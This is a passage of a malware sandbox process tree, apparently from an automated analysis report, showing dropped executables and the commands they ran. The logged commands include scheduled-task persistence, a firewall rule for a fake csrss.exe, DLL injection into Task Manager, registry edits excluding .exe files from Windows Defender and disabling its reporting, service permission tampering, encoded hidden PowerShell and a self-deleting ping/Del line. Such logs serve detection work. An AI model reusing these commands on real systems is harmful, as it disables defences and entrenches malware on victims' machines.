PID:3848 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe7⤵PID:3316
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:3092
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 34445⤵
- Program crash
PID:492
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe"C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3396 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:2624
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:8
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 11724⤵
- Program crash
PID:3592
-
-
-
C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2160
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:1856
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3940
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:4924
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:3496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:1896 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3908
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3912
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:3752 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:868
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:1308
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1088
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4232
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
-
-
C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe"C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3940
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 5325⤵
- Program crash
PID:3320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 5285⤵
- Program crash
PID:2780
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 8644⤵
- Program crash
PID:2388
-
-
-
C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:1804
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:868
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
-
-
C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe"C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3752 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 11644⤵
- Program crash
PID:1564
-
-
-
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exeC:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e82e1a8,0x6e82e1b4,0x6e82e1c04⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1808
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4412
-
-
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3460 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142125" --session-guid=77820e10-ad15-4e06-bd77-7e7f60bb5f81 --server-tracking-blob=YmViMGExMDNhN2QzMDlmMGFkNDI4OWU5ZWQ3M2UzOTA3ZDVjN2Y5YmU4YTFiOTFmMjg4MGViNDViYTk1N2YwYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzU2NzkuNTQ4MCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjM5MmMwYWFkLTYxNTgtNGE5ZS1hY2IzLTM4ZGRjNmJjZTFiYyJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2892 -
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exeC:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b0,0x2c0,0x2c4,0x28c,0x2c8,0x6deae1a8,0x6deae1b4,0x6deae1c05⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2076
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:3784
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4560 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xd50040,0xd5004c,0xd500585⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2720
-
-
-
-
C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe"C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe"3⤵
- Executes dropped EXE
PID:964 -
C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:916 -
C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe.\Install.exe /YnGgdidyhQpz "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:3468 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:2100
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:1112
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:1400
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:3032
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:1516
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:968
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:4252
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:1884
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVeYmuPuD" /SC once /ST 07:55:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:4992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVeYmuPuD"6⤵PID:2900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVeYmuPuD"6⤵PID:3320
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:968
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\ntdxxty.exe\" id /Itsite_idoir 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4232
-
-
-
-
-
-
C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe"C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4744
-
-
C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe"C:\Users\Admin\Pictures\vsQOe04HkxmuVDu5Ca6A8mW2.exe"3⤵
- Executes dropped EXE
PID:904 -
C:\Users\Admin\AppData\Local\Temp\7zS9A5B.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:2432 -
C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe.\Install.exe /YnGgdidyhQpz "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:2544 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:4084
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:3128
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:1080
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:1088
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:4996
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:3040
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:3440
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:4508
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNQTYWcCe" /SC once /ST 13:59:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:4888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4700
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNQTYWcCe"6⤵PID:3912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNQTYWcCe"6⤵PID:1644
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2192
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe\" id /KZsite_idnXc 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5028
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵PID:1972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3156 -ip 31561⤵PID:3048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3868 -ip 38681⤵PID:1072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3208 -ip 32081⤵PID:3192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3208 -ip 32081⤵PID:4188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3752 -ip 37521⤵PID:4592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1308 -ip 13081⤵PID:3324
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2788 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3064
-
-
